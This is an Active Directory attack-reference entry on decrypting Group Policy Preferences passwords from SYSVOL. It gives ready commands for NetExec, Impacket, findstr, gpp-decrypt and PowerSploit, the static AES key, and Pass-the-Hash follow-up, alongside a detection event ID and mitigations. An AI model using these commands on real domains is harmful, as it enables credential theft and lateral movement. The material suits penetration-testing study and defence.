attack-48-gpp-password-decryption.md (3253B)
1 --- 2 title: "Attack #48 β GPP Password Decryption" 3 description: "Group Policy Preferences (GPP) allowed admins to set local admin passwords, create scheduled tasks, and configure services via Group Policy β with theβ¦" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory"] 7 tools: ["NetExec", "Impacket", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/π£ Attack #48 β GPP Password Decryption.md" 11 --- 12 # π£ Attack #48 β GPP Password Decryption 13 14 *** 15 16 ## π How It Works 17 18 Group Policy Preferences (GPP) allowed admins to set local admin passwords, create scheduled tasks, and configure services via Group Policy β with the password stored in `cPassword` in XML files on SYSVOL. Microsoft encrypted these passwords with a **publicly-known static AES key** (published in MSDN documentation), making any GPP password trivially decryptable by any domain user who can read SYSVOL. 19 20 Microsoft patched this in **MS14-025** (May 2014), but old GPP XML files may still exist on SYSVOL. 21 22 *** 23 24 ## βοΈ Prerequisites 25 26 | Requirement | Detail | 27 |---|---| 28 | **Any domain user** | SYSVOL is readable by all authenticated users | 29 | **Legacy GPP files still present** | Created before MS14-025 | 30 31 *** 32 33 ## π» Full Commands 34 35 ```bash 36 # ββ NetExec β automated GPP password extraction ββββββββββββββββββββββββββββββ 37 nxc smb DC01.corp.local -u low_user -p 'Password1' -M gpp_password 38 39 # ββ Impacket β Get-GPPPassword ββββββββββββββββββββββββββββββββββββββββββββββββ 40 Get-GPPPassword.py corp.local/low_user:'Password1'@DC01.corp.local 41 42 # ββ Manual β search SYSVOL for cPassword ββββββββββββββββββββββββββββββββββββββ 43 findstr /S /I cPassword \\corp.local\SYSVOL\corp.local\Policies\*.xml 44 45 # ββ Decrypt the cPassword value βββββββββββββββββββββββββββββββββββββββββββββββ 46 gpp-decrypt <cPassword_value> 47 # The AES key is: 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b 48 ``` 49 50 ```powershell 51 # ββ PowerSploit βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 52 Import-Module .\PowerSploit.ps1 53 Get-CachedGPPPassword 54 Get-GPPPassword 55 ``` 56 57 *** 58 59 ## π‘οΈ Detection β Event IDs 60 61 | Event ID | Source | What to Look For | 62 |---|---|---| 63 | **5145** | Security Log (DC) | Access to SYSVOL β reading Policy XML files | 64 65 *** 66 67 ## π Attack Chain Context 68 69 ``` 70 [GPP Passwords] βββ Decrypt legacy local admin passwords from SYSVOL 71 β 72 ββββ π Extracted passwords often = local admin on many machines 73 ββββ π PtH (#4) with discovered credentials β lateral movement 74 ββββ π Defeated by: delete old GPP XML files, use LAPS instead 75 ``` 76 77 *** 78 79 > β **Attack #48 β GPP Password Decryption complete.**